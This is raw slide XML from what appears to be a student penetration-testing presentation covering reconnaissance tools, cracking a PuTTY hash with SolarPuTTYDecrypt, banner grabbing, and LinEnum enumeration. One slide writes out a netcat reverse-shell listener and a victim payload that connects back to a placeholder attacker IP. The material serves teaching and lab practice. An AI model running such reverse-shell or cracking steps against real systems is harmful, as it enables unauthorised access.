      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="A screenshot of a computer screen&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55E13434-BF9C-41DB-A0BC-C5AE0DC1F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129410"/>
            <a:ext cx="5458968" cy="4599180"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3988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C82A-3384-EF6D-BA0D-CDC8D3035C4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="761802" y="240241"/>
            <a:ext cx="10760054" cy="1228299"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F6FFFF1-C48A-56AA-FE16-B4CB39705328}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="761802" y="2321476"/>
            <a:ext cx="4864875" cy="3850724"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="100">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The putty tool is used for ssh connections and file transferring so it might be important backup file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="100">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>I tried to crack the hash by several tools like john the ripper and hashcat and crackstation website but couldn't and struggled a bit in this hash.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="100">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>After searching for a bit I found a tool made specially for cracking PuTTy hashes called SolarPuTTyDecrypt so I installed it and tried to crack the given hash.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50EE6682-D442-1231-12FA-C146878B28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8479" y="3007424"/>
            <a:ext cx="5178206" cy="1286134"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="71648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hand holding a magnifying glass over a computer screen&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F6996F7-AA5A-B759-30BE-A0C1EDA2B2AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="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r="246" b="-1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="782674" y="29548"/>
            <a:ext cx="10691270" cy="6013845"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7E3F886-2FCF-CCB4-7B35-BB66D367C8D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2552152" y="492452"/>
            <a:ext cx="7315200" cy="1010837"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Passive Reconnaissance"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E809CE2-8DB4-BC36-E6C2-BEA8C219DF38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="782671" y="1503290"/>
            <a:ext cx="9150703" cy="4892444"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tools </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WHOIS Lookup: Domain ownership details, Registrar information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>whois.domaintools.com </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DNS Enumeration :DNS records, Subdomains</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DNSDumpster</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Search Engine Recon (Google Dorking)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Email Harvesting  : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>theHarvester</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24219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screen shot of a computer&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA4D0F46-F278-B52B-98A2-9928BCAEACF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="659914" y="1242685"/>
            <a:ext cx="10872172" cy="188110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FEB1262-0B41-86C5-B015-4AE984AE3B3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="268205" y="3780317"/>
            <a:ext cx="9427337" cy="2216512"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>But the tool requires a password to be given to try cracking the hash with it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1463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7178A-CABE-DFCE-B1B8-6D50CA71B96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467B8A4-12B0-5231-EF75-FB9C0280D85E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1641752"/>
            <a:ext cx="5257800"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bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Privilege Escalation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12BAFBA1-9A25-A96E-DA03-637C753B2883}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="835023" y="2869003"/>
            <a:ext cx="4978495" cy="2454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solidFill>
                  <a:schemeClr val="bg1">
                    <a:alpha val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:alpha val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> – Banner Grabbing , Reverse Shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:alpha val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>LinEnum</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:alpha val="80000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:alpha val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>PrivescCheck</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:alpha val="80000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:alpha val="80000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="14" name="Group 13">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5" name="Group 14">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9" name="Freeform: Shape 18">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6" name="Group 15">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7" name="Freeform: Shape 16">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descr="A person sitting at a desk with a computer&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5A0A532-F93D-0F2B-78CE-3C50FE1EC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932" y="1410132"/>
            <a:ext cx="4369112" cy="2944749"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89319B0D-0FDF-6590-C259-FD7A97C905AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="693782" y="5487225"/>
            <a:ext cx="5260975" cy="6939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Nourhan Ayman</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="427144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B085C1-D0DE-D2CB-D70F-25F89ACD66A7}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10" descr="A close up of a blue and black book&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C182B18-121E-42AB-1971-398CDF0FB9A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect b="2500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434589C0-42E4-BEDE-212E-A05D788DF2B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="365125"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Banner Grabbing ( during enumeration )</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="9" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{645E4335-8F20-0490-BA9E-B0E8E1735625}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35937537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22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9"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8DC4E9-7062-C5C3-BD22-BFB0AFCA542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B449202-BAD4-0F28-2EC7-34F7EE073D7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="445991" y="640823"/>
            <a:ext cx="3604801" cy="5583148"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0"/>
              <a:t>Reverse shell</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system&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{967C0D1F-2B7B-6214-181C-F6F4DDA71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433" y="630936"/>
            <a:ext cx="6894576" cy="3343869"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8192F913-6145-D49B-D567-0BD6B6A89A25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4654295" y="4129549"/>
            <a:ext cx="7424633" cy="2097516"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Listener command : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="SFMono-Regular"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="SFMono-Regular"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="SFMono-Regular"/>
              </a:rPr>
              <a:t>lvnp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="SFMono-Regular"/>
              </a:rPr>
              <a:t> &lt;port-number-of-victim&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" b="1" i="0" dirty="0">
              <a:effectLst/>
              <a:latin typeface="SFMono-Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="SFMono-Regular"/>
              </a:rPr>
              <a:t>l -&gt; listener , v -&gt; verbose , n -&gt; do not use DNS , p -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>port specification</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Payload (victim ) : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>-of-attacker&gt; &lt;port-number-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="SFMono-Regular"/>
              </a:rPr>
              <a:t>of-victim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24901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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="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637F45-4EA7-ED16-D78F-5DAF4B3F3D6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8A855A5-D13A-0E49-BA2B-34513A6DEBDF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630936" y="639520"/>
            <a:ext cx="3429000" cy="1719072"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0" err="1"/>
              <a:t>LinEnum</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="5400" dirty="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E6207BC1-A115-C11B-405B-BCBC9CB9FF4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630935" y="2807208"/>
            <a:ext cx="3665293" cy="3916830"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Tool that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="__Inter_d65c78"/>
              </a:rPr>
              <a:t>automates the process of enumerating various aspects of the system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>./LinEnum.sh –r –t –d –k –n</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>r -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>root permission</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>t -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>target specific user </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>d -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>dump all user information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>k -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>kernal</a:t>
            </a:r>
            <a:r>
